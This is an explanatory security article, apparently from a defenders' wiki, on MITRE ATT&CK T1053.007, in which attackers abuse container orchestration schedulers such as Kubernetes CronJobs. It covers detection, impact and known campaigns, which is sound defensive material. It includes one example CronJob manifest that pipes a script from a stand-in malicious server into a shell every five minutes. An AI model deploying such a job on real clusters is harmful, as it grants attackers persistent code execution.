Container Orchestration Job

Container Orchestration Job [T1053.007]

Information

Name: Container Orchestration Job
ID: T1053.007
Tactics: TA0002, TA0003, TA0004
Technique: T1053

Introduction

Container Orchestration Job (T1053.007) is a sub-technique within the Scheduled Task/Job (T1053) technique category of the MITRE ATT&CK framework. This sub-technique specifically involves adversaries leveraging container orchestration platforms, such as Kubernetes, Docker Swarm, Amazon ECS, or Azure Container Instances, to schedule and execute malicious jobs or tasks. Attackers exploit legitimate job scheduling functionalities provided by these platforms to execute unauthorized commands, scripts, or binaries, thus achieving persistence, lateral movement, privilege escalation, or command and control (C2) communications.

Deep Dive Into Technique

Adversaries utilize container orchestration systems' built-in scheduling capabilities to execute malicious tasks. Container orchestrators such as Kubernetes and Docker Swarm periodically execute scheduled tasks or jobs, defined through YAML or JSON configuration files, to automate routine operations. Attackers exploit this functionality by injecting or modifying these scheduled jobs to run malicious payloads.

Technical execution details often include:

Kubernetes CronJobs:

Attackers create or modify CronJob resources to execute scripts or commands at scheduled intervals.
YAML manifests specify the container image, commands, and execution schedules (cron syntax).

Example Kubernetes manifest:

apiVersion: batch/v1
kind: CronJob
metadata:
  name: malicious-job
  namespace: default
spec:
  schedule: "*/5 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
            - name: malicious-container
              image: attacker-controlled-image
              command:
                [
                  "/bin/sh",
                  "-c",
                  "curl http://malicious-server/payload.sh | sh",
                ]
          restartPolicy: OnFailure

Docker Swarm Scheduled Tasks:
- Docker Swarm does not natively support scheduling jobs; however, attackers might leverage external schedulers or cron containers to achieve similar functionality.
- Attackers deploy malicious containers that periodically execute commands or scripts to maintain persistence or exfiltrate data.
Cloud Container Platforms (Amazon ECS, Azure Container Instances):
- Attackers schedule tasks using cloud-native scheduling tools (e.g., AWS CloudWatch Events, Azure Logic Apps) to trigger malicious container executions.
- Attackers manipulate task definitions or event triggers to execute containers containing malicious payloads.

Common mechanisms attackers use include:

Creating new scheduled jobs to establish persistence or maintain a foothold.
Modifying existing legitimate jobs to include malicious commands or payloads.
Using orchestrator APIs or compromised credentials to deploy malicious scheduled tasks.
Leveraging scripts or binaries within containers to perform reconnaissance, lateral movement, or data exfiltration.

When this Technique is Usually Used

Adversaries typically employ Container Orchestration Jobs during various stages of the attack lifecycle, including:

Persistence:
- Scheduling malicious tasks that periodically re-establish access if initial footholds are removed.
- Ensuring continued presence within compromised environments through regular execution of malicious payloads.
Execution:
- Utilizing scheduled tasks to execute payloads, scripts, or commands on containerized workloads.
- Automating command execution within compromised systems at predetermined intervals.
Privilege Escalation and Lateral Movement:
- Exploiting orchestrator privileges or misconfigurations to schedule tasks in higher-privileged namespaces or clusters.
- Moving laterally by scheduling tasks on other nodes or clusters within the orchestrated environment.
Command and Control (C2) Communications:
- Scheduling containers that periodically communicate with attacker-controlled infrastructure to receive commands or exfiltrate data.
Data Exfiltration:
- Automating data collection and exfiltration through scheduled container tasks.

How this Technique is Usually Detected

Detection mechanisms for Container Orchestration Jobs typically include:

Monitoring and Logging:
- Enabling and centrally collecting logs from container orchestration platforms (e.g., Kubernetes API server audit logs, Docker daemon logs).
- Monitoring scheduled job creation, modification, or deletion events closely.
Behavioral Analytics:
- Implementing anomaly detection solutions to identify unusual scheduled job creation or execution patterns.
- Detecting unusual container images or commands used in scheduled tasks.
Security Tools and Platforms:
- Container security solutions (e.g., Aqua Security, Sysdig, Prisma Cloud) capable of detecting suspicious container images, runtime behaviors, and orchestrator API activities.
- SIEM platforms (Splunk, ELK, QRadar) configured to alert on suspicious orchestration events or API calls.
Indicators of Compromise (IoCs):
- Unexpected CronJob or Job resources appearing in Kubernetes clusters.
- Scheduled tasks referencing unknown or untrusted container images.
- Unusual outbound network connections originating from scheduled containers.
- Logs indicating unauthorized API calls or modifications to orchestrator configurations.

Why it is Important to Detect This Technique

Early detection of Container Orchestration Job misuse is critical due to the following impacts:

Persistent Access:
- Attackers can maintain long-term persistence within containerized environments, making remediation challenging without detection.
Data Exfiltration:
- Scheduled malicious tasks can regularly exfiltrate sensitive data, intellectual property, or customer information, leading to significant financial and reputational damage.
Resource Abuse and Cost Implications:
- Attackers may use scheduled containers for cryptocurrency mining or other resource-intensive tasks, causing increased infrastructure costs.
Privilege Escalation and Lateral Movement:
- Misuse of orchestration platforms can allow attackers to escalate privileges or move laterally across container clusters, significantly expanding the attack surface.
Operational Disruption:
- Malicious scheduled tasks can disrupt legitimate workloads, degrade performance, or cause service outages, impacting business continuity.

Detecting this technique early allows organizations to rapidly contain incidents, minimize damage, and prevent attackers from achieving their objectives.

Examples

Real-world examples and scenarios involving Container Orchestration Jobs include:

TeamTNT Attacks:
- Attackers leveraging Kubernetes CronJobs to deploy cryptocurrency mining containers.
- Scheduled tasks periodically pulling malicious container images from attacker-controlled registries to mine cryptocurrencies, leading to increased cloud infrastructure costs and degraded performance.
Hildegard Malware:
- Hildegard malware targeted Kubernetes clusters, creating CronJobs to execute malicious scripts.
- Scheduled tasks downloaded and ran malicious payloads, enabling attackers to establish persistence, conduct lateral movement, and exfiltrate data.
Kinsing Malware Campaign:
- Attackers used compromised Kubernetes clusters to schedule malicious jobs for cryptocurrency mining.
- CronJobs executed periodically, ensuring persistent access and continuous resource abuse.
Azure Container Instance (ACI) Exploitation:
- Adversaries compromised Azure Container Instances, scheduling malicious containers that executed scripts to exfiltrate sensitive data to external servers.
- Attackers leveraged Azure Logic Apps or Azure Automation to trigger scheduled malicious containers.

In these scenarios, attackers leveraged scheduled container tasks to maintain persistence, execute malicious commands, escalate privileges, and exfiltrate data, demonstrating the critical importance of monitoring and detecting Container Orchestration Job abuses.

Last updated 10 days ago

Was this helpful?